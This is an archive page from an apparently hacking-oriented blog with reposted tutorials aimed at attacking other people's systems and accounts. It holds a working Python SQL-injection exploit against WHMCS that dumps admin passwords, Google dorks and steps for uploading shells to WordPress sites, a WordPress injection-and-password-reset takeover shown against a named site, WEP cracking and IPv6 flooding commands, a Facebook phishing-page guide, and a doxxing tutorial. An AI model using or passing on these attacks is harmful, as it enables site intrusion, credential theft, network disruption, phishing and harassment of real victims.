Home » Archives for Oktubre 2013

WORDPRESS EXPLOIT

in - on 6:31 PM - 5 comments
You Can Hack Thousands of WordPress Websites With This Exploit.
And Thousands of WordPress websites Are Vulnerable For This Attack

Google Dorks For This WordPress Exploit.
Google Dork 1) “inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Google Dork 2) /wp-content/plugins/easy-comment-uploads/upload-form.php
Google Dork 3) Index of /wp-content/plugins/easy-comment-uploads


Step 1
Open Google.com and Enter Any One Google Dork which Given,

Step 2
Now select any Website of WordPress.And Go To This
URL
VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php

You'll Get Upload Option Here Posted Image
Now Upload Your Shell To Deface The Website ….

Step 3
And Now Check It Here
VictimSite.com/wp-content/uploads/2012/10/yourfilehere
Read more
Mga etiketa:

WHMCS 5.x.x SQL INJECTION

in - on 6:30 PM - No comments
WHMCS 5.2.7 SQL Injection (2013.10.04)

Wink

Code:

#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = 'http://clients.target.com/' # wopsie dopsie
user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
user_pwd = 'hacker'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
Safari/537.36"

def exploit(sql):
print "Doing stuff: %s" % sql
r = urlopen(Request('%sclientarea.php?action=details' % url,
data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid
=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Ch
anges" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua,
"Cookie": user[0]})).read()
return re.search(r'(id="firstname" value="(.*?)")', r).group(2)

def login():
print "Getting CSRF token"
r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r.read()).group(2)
cookie = r.info()['set-cookie'].split(';')[0]
print "Logging in"
r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email,
user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
if 'dologin.php' in r:
sys.exit('Unable to login')
else:
return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r).group(2)]

user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get
admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as
x)#" % user_email)

--------------------------------------------------------------------------------------------------------
References:

http://localhost.re/p/whmcs-527-vulnerability
Read more
Mga etiketa:

WEP CRACKING TUTORIAL

in - on 6:25 PM - No comments
WEP Cracking with Backtrack

First, you will need to have Backtrack 4 (LINK)
*** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.

Login: root
Password: toor


Once logged in, type in: startx
BT4 is now set up, heres the following.
==

WEP CRACK GUIDE


1. Open konsole and type the following to start up network connections.

/etc/init.d/networking start


2. Now we are going to put the network card into monter mode by typing the following.

airmon-ng
(You will find your Interface here)

3. So first start up the scan

airmon-ng start wlan0 or 1
(depends on what it reads your card as, replace as needed)

4.Lets spoof your MAC address first by typing this next command.

ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up


This will make it so we change our MAC address to the computer we are connecting to

5.Time to start finding our victims router, type in konsole.

airodump-ng mon0

This will show the list and once you find one that suits your interest, Continue.

6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole

airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)

example: airodump-ng -c 1 - - bssid 11:22:33:44:55:66 -w wepcap mon0


7. Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:

aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0


8. Almost done, we just need to contune the ARP cycle, open another konsole and type:

aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.


Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL - C to stop the process and continue to 9.

9. Time to start cracking that cap file :D Open a new konsole and type.

aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap


10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)

Here is some alternate methods of using backtrack to get from Hakunamatata69 Tutorial that are interesting and work too.


==
---ALTERNATE ATTACKS---
FRAGMENTATION
1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
==
CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
***Be sure to open new Konsoles when necessary***
--
NOTES
Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Read more
Mga etiketa:

Send Fake Email / Bomber / Custom Email Address TOOL DOWNLOAD

in - on 6:25 PM - 3 comments

First, download the program [UPDATED VERSION!] here
VirusTotal

after downloading the program, run it and the program looks like this
[Image: screenshot_17.png]

now fill all text field on the application


[Image: screenshot_17.png]

after you fill up all textfields, then click Send Email button and wait till you got message box.

done. Your email was successfully sent to the target. your email will be entered in the Inbox folder (tested on my GMail)
Read more
Mga etiketa:

FIRST NAME ONLY FACEBOOK TUTORIAL

in - on 6:22 PM - No comments
How to Have a first name only on Facebook Guide.

STEP 1
Open Firefox:
Spoiler (Click to Hide)
[Image: Cw7hQ1y.jpg]

STEP 2
Go to - Settings:
Spoiler (Click to Hide)
[Image: 864u65l.jpg]

Advanced and finally Network. Click on settings and click on [b]Manual proxy configuration[/b].

Next to Http: and Port: write any of the following:
Note: If one of them doesn't work try the next one.
Spoiler (Click to Hide)
Code:
202.43.188.7 and for Port: 8080.
  202.43.93.51 and for Port: 3128.
  115.124.72.62 and for Port: 3128.
  202.43.188.15 and for Port: 8080.
  118.97.20.221 and for Port: 3128.
  175.45.187.121 and for Port: 8080.
  202.152.156.212 and for Port: 8080.
  202.43.93.55 and for Port: 3128.
  118.98.35.251 and for Port: 8080.
  202.43.93.60 and for Port: 3128.
  103.5.48.198 and for Port: 8080.
  202.43.93.9 and for Port: 3128.
  103.247.16.129 and for Port: 8080.
  202.43.93.58 and for Port: 3128.

After that tick the checkbox: Use this proxy server for all protocols. And finally click Okay:
Spoiler (Click to Hide)
[Image: sd7Xe86.jpg]

STEP 3
Go to: https://www.facebook.com/

Login with your Email/Password.
Note: Your account may be locked due to using
a proxy! This is can be easily fixed by going through the indentification
process.

Click on Menu located at the right top corner,
Select account settings:
Spoiler (Click to Hide)
[Image: xdgFKRQ.jpg]

Click edit your language,
Change it to: Bahasa Indonesian and finally click Save changes:
Spoiler (Click to Hide)
[Image: KuIVHO6.jpg]

Then edit your name,
Remove the last name and hit Simpan Perubahan to save changes:
Spoiler (Click to Hide)
[Image: 0m21QgX.jpg]

After that click on Bahasa to change the language
back to English and click on Simpan Perubahan:
Spoiler (Click to Hide)
[Image: Xdi46Md.jpg]
And finally click on top right menu and
hit: Logout to log you out safely:
Spoiler (Click to Hide)
[Image: i0FSumk.jpg]

After that head over to: Firefox - Options:
Spoiler (Click to Hide)
[Image: nQOJsQO.jpg]
Followed by: Advanced - Network
and finally Settings again, Remove the proxies and click on:
No Proxy to go out of proxy for faster surfing experience! and
click Okay:
Spoiler (Click to Hide)
[Image: a2YR43a.jpg]

I am not the owner of this tutorial so all credit goes to
whom ever figured this. I'm just re presenting it for educational
purposes and through a easier way to follow.

Enjoy and hope you found this much easier to follow.
If you require any help then post below.
Read more
Mga etiketa:

CRASH PC NETWORK TUTORIAL

in - on 6:19 PM - No comments
EDUCATIONAL PURPOSES ONLY

Hello Hackforums, I would like to release this simple tutorial onto how to crash a PC based network. This exploit will work on 90% of networks. If the network of Windows computers connected are vulnerable they will consume 100% CPU usage and then become unresponsive. Now how to check if a network is vulnerable.

Press Windows Key + R on your keyboard and type "cmd" then press enter. Once inside command prompt type the following command.
Code:
ipconfig
Then look at your results. If your results including something along the lines of "IPv6 Address" the network is vulnerable. 90% of network are currently vulnerable to this.

How to take out the network
1> Boot into Backtrack 5 R3 and connect to the network
2> Run this command
Code:
iwconfig
look at which adapter comes up with connections. It will most likely be eth0 or wlan0.
3> Prepare for attack. Type the following command and leave it running for however long you want the computers to remain unusable. Please do not use this for malicious purposes, this tutorial is to learn how to better protect yourself. The command to initiate the attack is
Code:
flood_router6 <network adapter you found earlier>
My code to launch an attack was
Code:
flood_router6 eth0

All Windows machines above XP including Vista, 7, 8 and SERVER can be attacked with this!

How to protect yourself!
A quick fix to protect yourself, disable IPv6 on your computer! Do this until a stable protocol has been established!

Thanks for reading, good luck to all in protecting yourself.
Read more
Mga etiketa:

COMPILATION OF PENETRATION TESTING TOOLS

in - on 6:18 PM - 1 comment
Here is a compilassstion of multiple forensic and penetration testing tools for applications, networks, and websites.

[Image: sitelogo.png]
Nmap
Nmap is a very versatile tool developed to scan addresses (IPV6 included), this tool allows the users to gather a mass amount of information about the target quickly, information including open ports, + much, much more.
Nmap supports a large number of scanning techniques such as: UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, IP Protocol, and Null scan.

[Image: IXcgJ.png]

A very powerful network troubleshooting and analysis tool,
Wire shark provides the ability to view data from a live network, and supports hundreds of protocols and media formats.

[Image: logooxid.png]
Cain & Abel

Cain and Abel is a revolutionary tool that provides many functions that are able to do various password retrieval jobs, cracking passwords, sniffing networks, and routing/analyzing protocols. This tool is Windows-only, unlike many other tools that exist, this is a pleasant twist to modern penetration testing and forensic tools.

[Image: logo.png]

MetaSploit, a very powerful network security and analysis tool, used often for penetration attacks, this tool has a clean interface and easily gathers the information that you seek.

[Image: HkR4k.png]

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. (Taken from their website)

[Image: FWR_Nessus1.jpg]

The Nessus tool provides high-speed data discovery, asset profiling, configuration auditing, and vulnerability analysis of networks.

[Image: 7diZx.png]

Havij is the most common and heard of testing tool for SQLI injection and many other web-based injection types. It fluently provides the site's scan, admin look-up, password cracking, and database retrieval. It literally makes it a breeze to hack, and find, vulnerable websites.

[Image: logo_small.png]

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. (Taken from Kismet website)

[Image: CPoer.png]

Back Track is a widely popular bootable Live-CD of a Linux Distro. Back Track offers a vast variety of penetration testing tools, along with those for network attacks, and supports many other forms of testing/attacking, for VOIP networks, Websites + more. The tool's interface and design provides an easy to use layout.

[Image: YLv2g.png]

W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation-plugins. In some ways it is like a web-focused Metasploit. (Taken from nmap.org)

[Image: guidance-software-logo.png]
EnCase is a suite of computer forensics software, commonly used by law enforcement. Its wide use has made it a de-facto standard in forensics. It is made to collect data from a computer in a forensically sound manner (employing checksums to help detect tampering). (Taken from Nmap.org.)


[Image: JuEqY.png]

Helix is a live bootable Ubuntu CD, that contains a multitude of forensic tools involving cellphones, computers, file systems, images, and tied into its sheer power is a friendly and easy-to-use interface.

[Image: L4fYp.png]

Acunetix is a strong, and very popular website security tool. It provides many tools to test your website, (or others) for various injections. Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

[Image: 6GXN9.png]

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. (Taken from http://portswigger.net/burp/)
Read more
Mga etiketa:

HOW TO DOX SOMEONE

in - on 6:12 PM - No comments
/###########################################\
|### || JP DoX tutorial || ###|
\###########################################/

====== The Power of a Dox: http://pastebin.com/qNbiTW4M =======

This tut is protected by copyright and
other international treaties.
LOL jk, feel free to post, but give some credz.

Perhaps in the wake of this undeclared cyber-war on various governments of the world,
you may have come across one or two dox's of political figures or CEO's. Most
commonly you can find these readily accessible on Pastebin, but have you wondered
how on earth people find this information?

Well it's easy, and perfectly legal.

You can find the answer (as well as source) to most problems by just a simple
search on the internet. Google, Yahoo, and bing work well in most instances, but
what about searching for people?

Whitepages? Can help.

But let's just say you're going for a little bit MORE detail, addresses, personal life
etc. Well there's a few tools to use, but most of the work will require a little more
intuition.

################################################################################​#################
#
For this you will need: #
#
#__ Google Chrome or Firefox, way faster and more secure then IE. #
#
I personally use Firefox. #
#
#__ Paper always works better then typing everything, but if you feel #
like typing is easier, use wordpad or something, as you may need to #
paste/take note of certain details in your "investigation." #
#
#__ Pastebin account to share with the world your results. #
#
#__ An ethical target/reason. #
(Don't just do it for fun, because often times that leads to the most trouble.) #
#
################################################################################​#################

Recommended to have:

#__ A collaborative group with good communication.

It's always so much easier when you have two or more people working towards
one common goal. But good communication (ventrillo, irc, etc) is also KEY.

#__ Middle mouse button.

Just get it. On MFF you can open a new tab by clicking on a link with it.
(Most don't know that..)

#__ PATIENCE

(Some dox's I've done take about 30 minutes, but there's been times where
it has taken hours, even with a collaborative group.)

###################
### || TOOLS || ###
###################

The tools of the trade:

*-- http://www.pipl.com
Very powerful people search tool, eliminates a lot of the trash you will
find with Google and other search engines

*-- namechk.com
Another very powerful tool that you can use to see if usernames are taken
on a whole bunch of sites. If you see that the person you are doxing uses
an odd alias, running one or two searches on here might be very useful.

*-- spokeo.com
Premium will be helpful. <3


@#@$%#$%^%$^&^%*^&*7543$^$%^$&%$%234@%#^$%^#$@#%%#@3

So my advice, try Facebook.

First time I ever dox'ed someone, I was able to snag their Facebook through a personal email
address I found through their employer, who often keep that information readily availible.
When I looked through his info tab, I discovered that he was refering to the students at the
school as animals, and his job was to 'tame' them. That's always good stuff to keep written down
and screenshotted. ;)

Usually employers keep emails and other valuable information public. Office numbers, emails, addresses,
can usually be very helpful, along with education.

For example, lets say you were one of the unlucky few that got pepper sprayed at OWS, and you knew this
asshole was a Captain, he obviously has some sort of education in law enforcement.

If his Facebook has a hometown and age, you can pretty easily search alumni records and find out more
about where this dirtbag went to school. It's pretty simple, and usually all this requires is a
Google website search.

Search Example: Hipster Cop site:itt-tech.org

This will run a search query specific to itt.

Hipster cop reference, occupy humor lol. Anyway, if you actually set your mind to it, you can track down
anyone through just their social media. And if not, you can probably snag him talking to neighbors
on wall posts, which could sometimes lead to addresses.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@ || Places to Check for INFORMATION || @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@​@
@ @
@ 1). Facebook, Twitter, other Social Media using PIPL.com @
@ 2). Employers, past and present. @
@ 3). Educational websites @
@ 4). Whitepages, for addresses etc. @
@ 5). Namechk.com if you know any common usernames used by them. @
@ 6). If they own any websites, do a WHOIS.org lookup.
7). Xbox Gamertags can lead to IP's or friends. @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@​@

Common DoX format.

Dox information may vary, but heres an easy format you can follow, areas will be filled in with
the information for Mr. Hairy Popo.

Name: Hairy Popo
Address: 333 OCISBAD Place.
Somerandomtown, OR 01337

Phone #: 938-323-2232
Office : 999-919-1337 < Always good

Personal Email: hipstercop@nypd.goldmansachs.com
Work email: Hairypopo@corporatemercenaries.org

FacebookLink: facebook.com/hipstercop
Twitter: @HipsterCop
Youtube: Bueer.


Education: PoliceBrutality University
Hurting innocent people BA '03

Facist Bastards High School '98

Occupation: NYPD TARU Captain
Since 2003
Anyotherdirtyoufind.

Political
Party: Fascist

Childern: 3 (Posting names/ages in unethical and will look bad on you..)


Military
Service: IF any, combat experience and units help.

** Will explain why later. **

Criminal
Record: If any.



Most police officers' given arrests and citations are
public record but requires a little digging, database
intrusions are easy, but not legal. You can always take
a look at emails, you find some good dirt there sometimes.

REMEMBER WHEN ACCESSING EMAILS, USE HIDEMYASS. kthnx.


So why is military service important? Well assuming you're using it for ethical reasons and
the person you are doxing has done something dishonorable, you might have one of his buddies
reading the dox. You never know.

Read more
Mga etiketa:

TOP WAYS TO HACK FACEBOOK ACCOUNTS

in - on 6:09 PM - No comments


Top 8 Ways To Hack Facebook Accounts 

There are various methods to hack facbook account password like Keyloggers, Phishing websites etc.. whereas bruteforcing, dictionary attacks, DDOS attack etc will not work directly due account lockout feature. Today in this post I am going to share a very effective way to hack facebook account I named it Top 10 ways to hack facebook accounts



8 Way To Hack Facebook 

1. Facebook Phishing 




Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.
I have explained the step by step phishing process in my post below:
                     

2. Keylogging 

 Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. 

 I have explained the step by step process in my post 

 How To Hack Facebook With keylogging

3. Session Hijacking


Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.


4. Sidejacking With Firesheep


Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.
To know more about sidejacking attack and firesheep, read the post mentioned below:



5. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.
The most popular Mobile Phone Spying softwares are:
1. Mobile Spy 

6. DNS Spoofing 

 If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.
Click Here To Watch Facebook Hacking With DNS Spoofing(Video TuT)

7. USB Hacking 

Usb password stealer
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:

8. Man In the Middle Attacks

 If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below:
If you are really interested in learning how man in the middle attacks, you can view the presentation 


I have worked very hard on this post please leave comments if u like it


Read more
Mga etiketa:

HACK FACEBOOK USING PHISHING TECHNIQUE

in - on 6:08 PM - 1 comment
MAKING FACEBOOK PHISHING SITE TUTORIAL.

 Phishing is the act of attempting to acquire information such as usernames and passwords. phishing directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,and exploits the poor usability of current web security technologies. 
Tutorial:
            Hi Friends I'm again in front of you with easy & complete phishing tutorial, many times phising tricks posted here but almost user says they can't understand so now you can make your phising page eaisly step by step: .This have a great advantage it's a latest FB phising page made by me, reply here if you face any problem Download This Phising Script 
                                               Download

than go to 000webhost.com 
 and choose free account option
now you click on free domain

              In registration choose pass with combination of capital , small alphabets & numbers.
              after registration verify your account by email.

Now you can see your control panel (refesh page if required), goto control panel

click on File Manager
you can see a page for upload your file (Don't upload file here , it's must be upload on public directry according to below image)

Upload your facebook page in .zip format

now you can see your file below like this

Thats all... 
 Now Your Phishing fb page is  YourDomain.com/index.html 
index.html is your phishing page.

 Now you can send this page to your victimes, When your Victime login this fake page their login and pass store in your hosting directry  lol.txt  like below


Note: This default fb phising page redirect on www.google.com
 you can cange by editing hello.php in download fb phishing.zip pack

..This tutorial only for educational purpose for prevent you from hackers, applying this technique may be considerd as crime..

Read more
Mga etiketa:

HACKING WP without CRACKING HASH

- on 9:36 AM - No comments
ok so .. as the title says .. im going to show u .. how to hack a wordpress site .. without cracking the hashes ..

now .. this works with all the wordpress sqli exploits ever posted in any of its themes or plugins ..

Point to remember:

you cannot exploit the latest version of wordpress with this .. 3.4.2 .. which was released on 6th - september 2012 .. yea .. u heard it right .. released this month ..

now there are still tons of websites out there which haven't been updated yet ..

all the previous version can be exploited using this method ..


So .. lets start ..


Things u need

1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe


1) My Dork

There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is ..


Code:
inurl:"/?fbconnect_action=myhome"

now paste this code in google.com (one of my best frnds)
and u will see no. of vulnerable websites ..

2) now the website im going to use here is ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2


[Image: 1.PNG]


here the parameter userid is vulnerable to sqli ..

so lets see what we can get from the data base ..

im going to change the above URL with this

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email) ​,7,8,9,10,11,12+from+wp_users--

now u can see we got the username with the email id ..
[Image: 2.PNG]

now if i change the above URL to this ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass), ​7,8,9,10,11,12+from+wp_users--

im going to get the user name and the hashed password ..
 [Image: 3.PNG]

(point to be noted here .. im using concat here .. u can also use group_concat to get all the users..
again .. that would be ur knowledge how u use sqli)

now .. we all know that wordpress hashes belong to the category MD5(wordpress).. (different from simple MD5)
and are very hard to crack ..

but if ur mad .. u should think out of the box ..

so now follow the steps ..

a) go to the login page of of wordpress site .. in my case that would be ..

Code:
http://masaru.ikeda.me/wp-login.php

b) click on Lost your password ?
 [Image: 4.PNG]

c) now the wordpress will ask me for the username or email .. for which i want to reset the password .. in my case that is 'masaru' .. so go ahead and enter the username ..
[Image: 5.PNG]

d) now look closely .. it says .. "Check your e-mail for the confirmation link."
 [Image: 6.PNG]

e) now what wordpress does actually .. it sends an activation key to the email address of that user .. and it sets the value of activation key in the database aswell .. what u have to do is just to get that key ..

f) so now im going to change my URL to this .. to get the activation key ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa ​tion_key),7,8,9,10,11,12+from+wp_users--

and u can see .. we got the activation key here .. u should note it down somewhere ..
[Image: 7.PNG]

g) Now .. finally all we have to do is .. without going to the email address .. reset the password .. for that im going to add this to my URL ..

Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

and im going to replace the KEYHERE with the activation key i got .. and the USERNAME HERE with the username .. which in my case is 'masaru' .. so my URL will be ..

Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru

and VOILA .. the wordpress will ask u for ur new password ..
[Image: 8.PNG]


now go the login page again .. and try the new password .. and there u go .. u got access to the panel ..
[Image: 9.PNG]
now u know how to shell the wordpress site .. don't u ??

Trick for those .. who are actually MAD:
1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions .. goto the login page and see .. if there is an option there to go back to the main page of the blog.. like in my case see the option .. <- Back to Digital Way of Living then this is not 3.4.2 ... if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is working for me ..
[Image: 10.PNG]

2) once u have shelld the website .. get the database details .. use any database connector .. go to the table .. wp_user .. and in the column wp_pass .. replace the hash with the one u got in the very beginning .. the actual hash of the admin .. now the password will be again what it was before .. as nothing happened .. admin will never know what hit 'em ..

Now .. in the latest version .. 3.4.2 .. what happens actually .. that after confirming the activation key wordpress don't let you choose a new password .. rather . it actually sends u a random password on ur Email ..
yea i know its sad .. but don't worry .. someone will definitely discover any new way to work this out ..

thank u so much for viewing this thread .. if u find any trouble doing this .. hit me on FB or MSN .. contact details in my sig .. and don't try to use it on the same website i did .. because i already f***d it .. go and get ur own ..
Read more